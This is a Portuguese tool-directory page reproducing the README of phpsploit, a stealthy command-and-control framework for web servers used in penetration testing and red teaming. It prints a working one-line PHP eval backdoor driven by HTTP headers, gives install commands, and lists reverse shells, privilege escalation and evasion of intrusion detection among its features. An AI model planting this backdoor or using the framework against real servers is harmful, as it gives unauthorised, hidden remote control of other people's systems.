Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
phpsploit — Framework C2 completo que persiste silenciosamente em servidor web com um backdoor PHP de uma única linha. | Kitploit
Ferramentas/GitHubGitHub/nil0x42/phpsploit
Frameworks de Testes de PenetraçãoEscalada de PrivilégiosFrameworks de ExploraçãoMecanismos de PersistênciaExploração de Aplicações WebPós-ExploraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubnil0x42/phpsploit

phpsploit

Framework C2 completo que persiste silenciosamente em servidor web com um backdoor PHP de uma única linha.

2.5k468há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Master

Framework C2 completo que persiste silenciosamente em
servidor web através de um oneliner PHP polimórfico tweet


Unit Tests workflow Dependabot status codacy code quality CodeQL workflow codecov coverage codeclimate maintainability

Criado por nil0x42 e contribuidores


Visão Geral

A comunicação ofuscada é realizada usando cabeçalhos HTTP em solicitações padrão do cliente e respostas relativas do servidor web, tunelada através de um pequeno backdoor polimórfico:

root@kitploit:~
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Início Rápido

root@kitploit:~
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Funcionalidades

  • Eficiente: Mais de 20 plugins para automatizar tarefas de escalada de privilégios

    • Executar comandos e explorar o sistema de arquivos, ignorando restrições de segurança do PHP
    • Enviar/Receber arquivos entre cliente e alvo
    • Editar arquivos remotos através do editor de texto local
    • Executar console SQL no sistema alvo
    • Criar shells TCP reversos
  • Furtivo: O framework é feito por paranóicos, para paranóicos

    • Quase invisível para análise de logs e detecção de assinaturas NIDS
    • Modo seguro e bypass comum de restrições de segurança PHP
    • Comunicações ocultas em Cabeçalhos HTTP
    • Payloads carregados são ofuscados para bypass de NIDS
    • Suporte a Proxy http/https/socks4/socks5
  • Conveniente: Uma interface robusta com muitos recursos cruciais

    • Ajuda detalhada para qualquer opção (comando help)
    • Multiplataforma tanto no cliente quanto no servidor.
    • CLI com suporte a auto-completar e multi-comando
    • Recurso de salvar/carregar sessão e histórico persistente
    • Suporte a múltiplas requisições para payloads grandes (como uploads)
    • Fornece um motor de configurações poderoso e altamente configurável
    • Cada configuração, como user-agent, tem um modo polimórfico
    • Variáveis de ambiente personalizáveis para interação com plugins
    • Oferece uma API completa para desenvolvimento de plugins

Plataformas suportadas (como atacante):

  • GNU/Linux
  • Mac OS X

Plataformas suportadas (como alvo):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT

Contribuidores

Agradecimentos a estas pessoas maravilhosas:

Este projeto segue a especificação all-contributors. Contribuições de qualquer tipo são bem-vindas

Baixar ferramenta

nil0x42

💻 🚇 🔌 ⚠️

shiney-wh

💻 🔌

Wannes Rombouts

💻 🚧

Amine Ben Asker

💻 🚧

jose nazario

📖 🐛

Sujit Ghosal

📝

Zerdoumi

🐛

tristandostaler

🐛

Rohan Tarai

🐛

Jonas Lejon

📝